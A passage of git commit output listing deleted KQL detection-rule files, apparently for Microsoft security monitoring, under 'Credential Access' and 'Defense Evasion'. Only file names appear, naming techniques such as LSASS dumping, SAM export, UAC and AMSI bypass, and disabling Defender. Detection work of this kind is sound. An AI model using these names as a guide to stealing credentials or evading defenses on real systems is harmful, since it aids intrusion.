100644 Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql delete mode 100644 Credential Access/SafetyKatz_Default_Dump_Filename.kql delete mode 100644 Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql delete mode 100644 Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql delete mode 100644 Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql delete mode 100644 Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql delete mode 100644 Credential Access/Suspicious_Dump64.exe_Execution.kql delete mode 100644 Credential Access/Suspicious_File_Event_With_Teams_Objects.kql delete mode 100644 Credential Access/Suspicious_Key_Manager_Access.kql delete mode 
100644 Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql delete mode 100644 Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql delete mode 100644 Credential Access/Suspicious_PFX_File_Creation.kql delete mode 100644 Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql delete mode 100644 Credential Access/Suspicious_Reg_Add_Open_Command.kql delete mode 100644 Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql delete mode 100644 Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql delete mode 100644 Credential Access/Suspicious_Serv-U_Process_Pattern.kql delete mode 100644 Credential Access/Suspicious_Unattend.xml_File_Access.kql delete mode 100644 Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql delete mode 100644 Credential Access/Time_Travel_Debugging_Utility_Usage.kql delete mode 100644 Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql delete mode 100644 Credential Access/Typical_HiveNightmare_SAM_File_Export.kql delete mode 100644 Credential Access/Uncommon_Outbound_Kerberos_Connection.kql delete mode 100644 Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql delete mode 100644 Credential Access/WerFault_LSASS_Process_Memory_Dump.kql delete mode 100644 Credential Access/Windows_Credential_Editor_Registry.kql delete mode 100644 Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql delete mode 100644 Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql delete mode 100644 Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql delete mode 100644 Defense Evasion/Abusing_Print_Executable.kql delete mode 100644 Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql delete mode 100644 Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql delete mode 100644 Defense 
Evasion/Add_DisallowRun_Execution_to_Registry.kql delete mode 100644 Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql delete mode 100644 Defense Evasion/Add_New_Download_Source_To_Winget.kql delete mode 100644 Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql delete mode 100644 Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql delete mode 100644 Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql delete mode 100644 Defense Evasion/AgentExecutor_PowerShell_Execution.kql delete mode 100644 Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql delete mode 100644 Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql delete mode 100644 Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql delete mode 100644 Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql delete mode 100644 Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql delete mode 100644 Defense Evasion/AspNetCompiler_Execution.kql delete mode 100644 Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql delete mode 100644 Defense Evasion/Atbroker_Registry_Change.kql delete mode 100644 Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql delete mode 100644 Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql delete mode 100644 Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql delete mode 100644 
Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql delete mode 100644 Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql delete mode 100644 Defense Evasion/Blackbyte_Ransomware_Registry.kql delete mode 100644 Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql delete mode 100644 Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql delete mode 100644 Defense Evasion/Bypass_UAC_via_CMSTP.kql delete mode 100644 Defense Evasion/Bypass_UAC_via_WSReset.exe.kql delete mode 100644 Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql delete mode 100644 Defense Evasion/CMSTP_Execution_Process_Creation.kql delete mode 100644 Defense Evasion/CMSTP_Execution_Registry_Event.kql delete mode 100644 Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql delete mode 100644 Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql delete mode 100644 Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql delete mode 100644 Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql delete mode 100644 Defense Evasion/Change_the_Fax_Dll.kql delete mode 100644 Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql delete mode 100644 Defense Evasion/CobaltStrike_Load_by_Rundll32.kql delete mode 100644 Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql delete mode 100644 Defense Evasion/Code_Execution_via_Pcwutl.dll.kql delete mode 100644 Defense Evasion/Control_Panel_Items.kql delete mode 100644 Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql delete mode 100644 Defense Evasion/CreateDump_Process_Dump.kql delete mode 100644 Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql delete mode 100644 Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql delete mode 100644 Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql delete mode 100644 Defense 
Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql delete mode 100644 Defense Evasion/Curl_Download_And_Execute_Combination.kql delete mode 100644 Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql delete mode 100644 Defense Evasion/DHCP_Callout_DLL_Installation.kql delete mode 100644 Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql delete mode 100644 Defense Evasion/DLL_Execution_via_Rasautou.exe.kql delete mode 100644 Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql delete mode 100644 Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql delete mode 100644 Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql delete mode 100644 Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql delete mode 100644 Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql delete mode 100644 Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql delete mode 100644 Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql delete mode 100644 Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql delete mode 100644 Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql delete mode 100644 Defense Evasion/DeviceCredentialDeployment_Execution.kql delete mode 100644 Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql delete mode 100644 Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql delete mode 100644 Defense Evasion/Directory_Removal_Via_Rmdir.kql delete mode 100644 Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql delete mode 100644 Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql delete mode 100644 Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql delete mode 100644 Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql delete mode 100644 Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql delete mode 100644 Defense 
Evasion/Disable_PUA_Protection_on_Windows_Defender.kql delete mode 100644 Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql delete mode 100644 Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql delete mode 100644 Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql delete mode 100644 Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql delete mode 100644 Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql delete mode 100644 Defense Evasion/Disable_Windows_Firewall_by_Registry.kql delete mode 100644 Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql delete mode 100644 Defense Evasion/Disable_Windows_Security_Center_Notifications.kql delete mode 100644 Defense Evasion/Disable_of_ETW_Trace.kql delete mode 100644 Defense Evasion/Disabled_IE_Security_Features.kql delete mode 100644 Defense Evasion/Disabled_Volume_Snapshots.kql delete mode 100644 Defense Evasion/Disabled_Windows_Defender_Eventlog.kql delete mode 100644 Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql delete mode 100644 Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql delete mode 100644 Defense Evasion/Dism_Remove_Online_Package.kql delete mode 100644 Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql delete mode 100644 Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql delete mode 100644 Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql delete mode 100644 Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql delete mode 100644 Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql delete mode 100644 Defense Evasion/DumpMinitool_Execution.kql delete mode 100644 Defense Evasion/DumpStack.log_Defender_Evasion.kql delete mode 100644 Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql delete mode 100644 Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql delete mode 100644 
Defense Evasion/ETW_Logging_Disabled_For_SCM.kql delete mode 100644 Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql delete mode 100644 Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql delete mode 100644 Defense Evasion/EVTX_Created_In_Uncommon_Location.kql delete mode 100644 Defense Evasion/Enable_LM_Hash_Storage.kql delete mode 100644 Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql delete mode 100644 Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql delete mode 100644 Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql delete mode 100644 Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql delete mode 100644 Defense Evasion/EventLog_EVTX_File_Deleted.kql delete mode 100644 Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql delete mode 100644 Defense Evasion/Execute_Code_with_Pester.bat.kql delete mode 100644 Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql delete mode 100644 Defense Evasion/Execute_Files_with_Msdeploy.exe.kql delete mode 100644 Defense Evasion/Execute_From_Alternate_Data_Streams.kql delete mode 100644 Defense Evasion/Execute_MSDT_Via_Answer_File.kql delete mode 100644 Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql delete mode 100644 Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql delete mode 100644 Defense Evasion/Execution_Of_Non-Existing_File.kql delete mode 100644 Defense Evasion/Execution_from_Suspicious_Folder.kql delete mode 100644 Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql delete mode 100644 Defense Evasion/Execution_via_WorkFolders.exe.kql delete mode 100644 Defense Evasion/Execution_via_stordiag.exe.kql delete mode 100644 Defense Evasion/Explorer_NOUACCHECK_Flag.kql delete mode 100644 Defense Evasion/Explorer_Process_Tree_Break.kql delete mode 100644 Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql delete mode 100644 Defense 
Evasion/File_Deleted_Via_Sysinternals_SDelete.kql delete mode 100644 Defense Evasion/File_Deletion_Via_Del.kql delete mode 100644 Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql delete mode 100644 Defense Evasion/File_Download_Via_Bitsadmin.kql delete mode 100644 Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql delete mode 100644 Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql delete mode 100644 Defense Evasion/File_Download_Via_InstallUtil.EXE.kql delete mode 100644 Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql delete mode 100644 Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql delete mode 100644 Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql delete mode 100644 Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql delete mode 100644 Defense Evasion/Findstr_Launching_.lnk_File.kql delete mode 100644 Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql delete mode 100644 Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql delete mode 100644 Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql delete mode 100644 Defense Evasion/Fsutil_Suspicious_Invocation.kql delete mode 100644 Defense Evasion/Gpscript_Execution.kql delete mode 100644 Defense Evasion/Greedy_File_Deletion_Using_Del.kql delete mode 100644 Defense Evasion/HH.EXE_Execution.kql delete mode 100644 Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql delete mode 100644 Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql delete mode 100644 Defense 
Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql delete mode 100644 Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_EDRSilencer_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql delete mode 100644 Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql delete mode 100644 Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_PowerTool_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_Stracciatella_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_WinPwn_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql delete mode 100644 Defense Evasion/HackTool_-_XORDump_Execution.kql delete mode 100644 Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql delete mode 100644 Defense Evasion/Hiding_Files_with_Attrib.exe.kql delete mode 100644 Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql delete mode 100644 Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql delete mode 100644 Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql delete mode 100644 Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql delete mode 100644 Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql delete mode 100644 Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql delete mode 100644 Defense Evasion/Imports_Registry_Key_From_a_File.kql delete mode 100644 Defense Evasion/Imports_Registry_Key_From_an_ADS.kql delete mode 100644 Defense 
Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql delete mode 100644 Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql delete mode 100644 Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql delete mode 100644 Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql delete mode 100644 Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql delete mode 100644 Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql delete mode 100644 Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql delete mode 100644 Defense Evasion/JScript_Compiler_Execution.kql delete mode 100644 Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql delete mode 100644 Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql delete mode 100644 Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql delete mode 100644 Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql delete mode 100644 Defense Evasion/Legitimate_Application_Dropped_Archive.kql delete mode 100644 Defense Evasion/Legitimate_Application_Dropped_Executable.kql delete mode 100644 Defense Evasion/Legitimate_Application_Dropped_Script.kql delete mode 100644 Defense 
Evasion/LiveKD_Driver_Creation.kql delete mode 100644 Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql delete mode 100644 Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql delete mode 100644 Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql delete mode 100644 Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql delete mode 100644 Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql delete mode 100644 Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql delete mode 100644 Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql delete mode 100644 Defense Evasion/MSHTA_Suspicious_Execution_01.kql delete mode 100644 Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql delete mode 100644 Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql delete mode 100644 Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql delete mode 100644 Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql delete mode 100644 Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql delete mode 100644 Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql delete mode 100644 Defense Evasion/Microsoft_Office_DLL_Sideload.kql delete mode 100644 Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql delete mode 100644 Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql delete mode 100644 Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql delete mode 100644 Defense Evasion/Modification_of_IE_Registry_Settings.kql delete mode 100644 Defense Evasion/Modify_Group_Policy_Settings.kql delete mode 100644 Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql delete mode 100644 Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql delete mode 100644 Defense Evasion/MsiExec_Web_Install.kql delete mode 100644 Defense Evasion/Msiexec_Quiet_Installation.kql delete mode 100644 Defense Evasion/Msxsl.EXE_Execution.kql 
delete mode 100644 Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql delete mode 100644 Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql delete mode 100644 Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql delete mode 100644 Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql delete mode 100644 Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql delete mode 100644 Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql delete mode 100644 Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql delete mode 100644 Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql delete mode 100644 Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql delete mode 100644 Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql delete mode 100644 Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql delete mode 100644 Defense Evasion/New_File_Association_Using_Exefile.kql delete mode 100644 Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/New_PortProxy_Registry_Entry_Added.kql delete mode 100644 Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql delete mode 100644 Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql delete mode 100644 Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Node_Process_Executions.kql delete mode 100644 Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql delete mode 100644 Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql delete mode 100644 Defense Evasion/NtdllPipe_Like_Activity_Execution.kql delete mode 100644 Defense Evasion/OceanLotus_Registry_Activity.kql delete mode 100644 Defense 
Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql delete mode 100644 Defense Evasion/Office_Macros_Warning_Disabled.kql delete mode 100644 Defense Evasion/OilRig_APT_Registry_Persistence.kql delete mode 100644 Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql delete mode 100644 Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql delete mode 100644 Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql delete mode 100644 Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql delete mode 100644 Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql delete mode 100644 Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql delete mode 100644 Defense Evasion/PUA_-_AdvancedRun_Execution.kql delete mode 100644 Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql delete mode 100644 Defense Evasion/PUA_-_CleanWipe_Execution.kql delete mode 100644 Defense Evasion/PUA_-_DefenderCheck_Execution.kql delete mode 100644 Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql delete mode 100644 Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql delete mode 100644 Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Defense Evasion/Persistence_Via_New_SIP_Provider.kql delete mode 100644 Defense Evasion/Ping_Hex_IP.kql delete mode 100644 Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql delete mode 100644 Defense Evasion/Potential_7za.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql delete mode 100644 Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql delete mode 100644 Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql delete mode 100644 Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Adplus.EXE_Abuse.kql delete mode 100644 Defense 
Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql delete mode 100644 Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql delete mode 100644 Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql delete mode 100644 Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql delete mode 100644 Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql delete mode 100644 Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql delete mode 100644 Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql delete mode 100644 Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql delete mode 100644 Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql delete mode 100644 Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql delete mode 100644 Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql delete mode 100644 Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql delete mode 100644 Defense 
Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql delete mode 100644 Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql delete mode 100644 Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql delete mode 100644 Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql delete mode 100644 Defense Evasion/Potential_EACore.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Edputil.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql delete mode 100644 Defense Evasion/Potential_EventLog_File_Location_Tampering.kql delete mode 100644 Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql delete mode 100644 Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql delete mode 100644 Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql delete mode 100644 Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql delete mode 100644 Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql delete mode 100644 Defense 
